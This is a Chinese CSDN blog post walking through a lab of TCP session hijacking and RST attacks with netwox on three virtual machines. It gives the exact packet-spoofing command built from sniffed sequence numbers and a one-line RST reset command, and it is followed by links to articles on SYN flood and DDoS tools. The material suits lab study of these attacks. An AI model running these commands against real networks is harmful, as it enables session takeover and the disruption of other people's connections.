利用netwox工具进行局域网内TCP会话劫持和RST攻击,步骤清晰,过程简洁

最新推荐文章于 2024-08-17 10:30:35 发布
最新推荐文章于 2024-08-17 10:30:35 发布
阅读量3.9k 收藏 26
点赞数 8
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43476621/article/details/107567498
版权

开启telnet服务

检查是否安装telnet和xinetd
rpm -qa telnet-server
rpm -qa xinetd
如果没有安装,则先安装
安装命令
yum install telnet-server
yum install xinetd
安装完成后,将xinetd服务和telnet服务加入开机自启动
systemctl enable xinetd.service
systemctl enable telnet.socket
启动以上两个服务
systemctl start telnet.socket
systemctl start xinetd
别忘记关闭防火墙
systemctl stop firewalld.service
禁止防火墙开机启动
systemctl disable firewalld.service

介绍一下本文的网络结构

攻击机为kali IP为192.168.43.195
客户机为centos7 IP为192.168.43.138
服务器为centos7 IP为192.168.43.153
实验前请确定这三台主机在同一网段
查看IP地址命令为ip addr
下图中IP地址为192.168.43.138
在这里插入图片描述
如果不在同一网段需要在虚拟机设置-网络适配器中改为桥接模式
在这里插入图片描述
若不成功,在VMware工具栏中选择【编辑】-虚拟网络编辑器
在这里插入图片描述
在这里插入图片描述
选择还原默认设置
或将虚拟机的网络配置为DHCP,具体步骤可以去百度
若以上均无效(迫不得已)可以重建虚拟机选择桥接模式

TCP会话劫持

首先在kali主机上打开wireshark(kali自带wireshark)
sudo wireshark(以root权限打开)
在这里插入图片描述
选择监听他们的共用网卡
在这里插入图片描述
选择过滤条件为telnet包
在这里插入图片描述客户机连接服务器
在这里插入图片描述
注意:默认无权限登录服务器的root用户
这时kali已经捕获到了telnet包
在这里插入图片描述
查看最后一个服务器给客户端的报文的信息
可以看到源端口为23 目的端口为36946 Next seq为227906598 Ack为972054647
我们根据这些信息来确定伪造客户端发送给服务器的包的信息,这里需要用到三次握手的知识
利用下图简单介绍一下实验中需要用到的相关知识
计算机网络 第七版 谢希仁 三次握手图
我们可以看到需要回送的包的seq的值为上一个接收到的包的ack值,ack的值为上一个接收到的包的Next seq的值(图中Next seq的值为y+1)
注意:如果你的wireshark显示的Next seq值为relative如下图,右键协议首选项,将Relative sequence numbers 前的勾去掉
在这里插入图片描述
获得以上信息后我们在kali主机中利用netwox伪造数据包
命令为sudo netwox 40 --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.43.138 --ip4-dst 192.168.43.153 --tcp-src 36946 --tcp-dst 23 --tcp-seqnum 972054647 --tcp-acknum 227906598 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "616263"
其中192.168.43.138为客户机IP 192.168.43.153为服务器IP 36946为客户端的端口号 seqnum为上图中的Ack的值 acknum为上图中Next seq的值 616263为abc的16进制表示,data中也可以发送其他数据
在这里插入图片描述
在wireshark可以看到捕获到了客户端发给服务器的一条数据为abc的包,证明劫持成功
在这里插入图片描述

RST攻击

RST字段代表复位,用来关闭异常连接
一条简单的命令sudo netwox 78 -i “192.168.43.138”
其中192.168.43.138为客户端的IP地址
此时发现客户端与服务器已经断开连接
在这里插入图片描述

浪花满袖
关注
TCP RST攻击实验流程
The__Apollo的博客
04-10 6607
TCP RST攻击也称伪造TCP重置报文攻击,它通过更改TCP协议头的标志位中的“reset”比特位(0变1),来关闭掉一个TCP会话连接。 首先,A为kali攻击机,B为靶机(win2000),C为服务器(ubuntu)。其中服务器的IP地址如下 我们用靶机B建立和C的23端口的连接,利用telnet命令 这时,我们启动A中的wireshark,进行数据包的监视: 打开NETWOX,调
基于hunt工具TCP会话劫持攻击实验
The__Apollo的博客
04-10 9743
TCP会话劫持攻击,是劫持通信双方已建立的TCP会话连接,假冒其中一方的身份与另一方进行进一步通信。通常一些网络服务会建立在TCP会话之后进行应用层的身份认证,客户端在通过身份认证之后,就可以通过TCP会话连接对服务器索取资源。且期间不用再次进行身份认证。而TCP会话劫持攻击者提供了一种绕过应用层身份认证的技术途径,因此得到较高水平攻击者的青睐。实验环境: A:攻击机kali B:TCP会话
Windows 平台下局域网劫持测试工具 – EvilFoca
10-24
EvilFoca是Windows环境下基于.NET FrameWork的一款轻量级的劫持测试工具。与BackTrack和Kali_Linux下复杂的命令相比,EvilFoca更加小巧,轻便,简单,但其效果更加显著高效。
常见DDoS攻击RST flood
最新发布
Grand_whh的博客
08-17 748
RST flood 是一种网络攻击手段,属于TCP协议中的拒绝服务攻击(DoS)的一种形式。在这种攻击中,攻击者发送伪造的TCP RST(Reset)数据包到目标服务器,目的是迫使服务器关闭活跃的TCP连接,从而影响服务的正常运行。这种攻击通常用于中断网络服务,使得合法用户无法访问目标服务器。RST flood 攻击可以是分布式拒绝服务攻击(DDoS)的一部分,攻击者可能利用僵尸网络来放大攻击效果。攻击者通过发送大量的RST数据包,导致服务器资源耗尽,无法处理正常的TCP连接请求。
使用netwox实现tcp rst 攻击及防御措施
whoim_i的博客
11-18 4449
目录相关原理(tcp基础)实例演示关于防御措施 相关原理(tcp基础) 三次握手:TCP是基于IP网络层之上的传输层协议,用于端到端的可靠的字节流传输。 过程: 1.C向S发送连接请求,标记位SYN设为1,且随机设置序列号seq 2.S返回确认消息,ACK设为seq+1,标记位SYN设为1,随机序列号seq 3.C返回确认消息,ACK设为seq+1 四次挥手:四次挥手指正常连接中断的情况。 过程:...
分别用netwox和scapy进行TCP 会话劫持攻击,包括注入普通命令和反向shell
m0_56222998的博客
04-20 1094
发起TCP会话劫持攻击,并且能够反向shell
ddos、http协议、TCP协议攻击工具及使用方法(Hyenae、SlowHTTPTest、Torshammer、Pyloris、Zarp)
网络安全领域优质创作者
10-19 5967
Hyenae : 不做推荐介绍,因为把我自己的路由器玩崩了,本地路由器响应不了那么多的请求,本地电脑不要轻易尝试。感兴趣的自行百度。 SlowHTTPTest:很好用。 Slowhttptest是依赖HTTP协议的慢速攻击DoS攻击工具,设计的基本原理是服务器在请求完全接收后才会进行处理,如果客户端的发送速度缓慢或者发送不完整,服务端为其保留连接资源池占用,大量此类请求并发将导致DoS。 攻...
tcp攻击
weixin_30678349的博客
04-04 120
转载于:https://www.cnblogs.com/guoyongjian/p/8718055.html
tcp劫持和syn flood攻击
pray030的博客
12-09 1262
实验名称 TCP 劫持和syn flood攻击 实验目的 通过对netwox 工具的使用,理解syn flood, TCP RST攻击原理。 理解 TCP hijack 的攻击原理,并能够使用 Hunt 工具发动攻击。 实验内容 1. Syn flood 攻击 1.1 装载入KALI 虚拟机,使用netstat -na| grep tcp 观测是否有打开的端口,并截图。配置ssh_config 文件,使得之后远程主机可以登录。 1.2在VMWare 上,使用“复制”,创建出三个虚拟机分别命名为1号
TCP协议漏洞利用及解决记录与netwox攻击实验记录
接下来,我们使用netwox工具进行TCP SYN-Flooding攻击。首先关闭了服务器端的SYN cookie选项,进行攻击前和攻击中分别测试了用户机访问目标机的效果,并记录和截图了实验结果。然后又打开了SYN cookie选项,同样...
网络工具netwox.zip
04-19
网络工具netwox.zip
awl-0.2.tar.gz TCP SYN洪水攻击 linux工具
01-19
awl-0.2.tar.gz TCP SYN洪水攻击 linux工具 多线程mac伪装SYN洪水攻击工具
TCP攻击监控器 v1.0
03-15
软件介绍 一款可监控记录TCP攻击连接的免费软件,该工具界面简洁,使用简单,用户可自由设定需要监控的端口,可自动对TCP连接进行统计和排序,不仅可知道哪些IP连接了你的端口,而且还知道每个IP和你的端口建立的连接数量,并且按照连接数由多到少做了排序,这样就可轻松把攻击IP添加到防火墙中或者是导出到文件记录下来,实在是系统和网络管理员的得力助手和必备工具
会话劫持
weixin_30648587的博客
04-29 230
1、简介   在现实生活中,比如你去市场买菜,在交完钱后你要求先去干一些别的事情,稍候再来拿菜;如果这个时候某个陌生人要求把菜拿走,卖菜的人会把菜给陌生人吗?!当然,这只是一个比喻,但这恰恰就是会话劫持的喻意。所谓会话,就是两台主机之间的一次通讯。例如你Telnet到某台主机,这就是一次Telnet会话;你浏览某个网站,这就是一次HTTP会话。而会话劫持(Session Hijack),就是结合...
TCP三次握手之-awl工具-SYN洪水攻击
心有鸿鹄天地,不敢妄坠人间
03-06 2221
文章目录云盾数据TCP三次握手TCP报文段的头部格式实战-使用tcpdump 抓包tcpdump 常用参数tcpdmp 抓包awl -syn-洪水攻击原理实战总结: 云盾数据 - http://ssa.yundun.com/cc #云盾全球实时攻防图 TCP三次握手 TCP报文段的头部格式 图 ACK:TCP协议规定,只有ack=1时,有效,也规定连接建立后,所有发送的报文ack必须为...
使用netwox/TCP协议检测网络性能
qq_23350817的博客
06-12 576
网络
使用hping3网络工具构造TCP/IP数据包和进行DDos攻击
new9232的博客
03-31 3791
hping3是一个强大的命令行工具,用于生成、发送和解析TCP/IP协议的数据包。它是开源的网络安全工具,由Salvatore Sanfilippo开发,主要应用于网络审计、安全测试和故障排查等领域。hping3不仅可以作为普通的网络连通性检测工具,还因其高度的灵活性和可定制性而被广泛用于渗透测试、防火墙测试、DoS/DDoS攻击模拟以及协议漏洞研究。
局域网dns欺骗攻击不能上网_局域网下实现劫持其他人设备
weixin_39912163的博客
12-28 241
使用系统:Kali Linux免费无毒下载地址:https://www.kali.org/以下内容是本人的渗透技术学习笔记,由于本篇文章比较敏感,所以这里只列举最基础的劫持手法,感兴趣的各位请自行拓展。教程全程小白教学,无需掌握任何技术。教程最终可实现,在局域网下可监控其他在局域网下的任何设备。可以查看对方浏览的网页等等信息,也可以拦截对方的数据包让对象无法联网。教程开始。1、创建一个名...
dns内网劫持、dns劫持工具好用的有那些
seven9711的博客
01-06 1933
一、原理 虽然计算机之间通信需要对方的ip,但是最底层的传输是物理层上,传输的是二进制和MAC帧,将ip解析成MAC地址的是ARP缓存表,这个缓存表每个第二层设备及以上都有。 主机A要和主机B通信,知道主机A的ip,但是arp缓存表了没有主机B的MAC地址,于是他会在局域网内广播询问主机B的mac,主机B会应答自己的MAC.(注:因为每个主机的ip是不固定的,所以设备的arp缓存表也要每隔一段时间都会更新,发起广播) 这种工作方式有一个BUG,就是如果主机C不停的应答自己的MAC,主机A广播询问主机B的MA
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值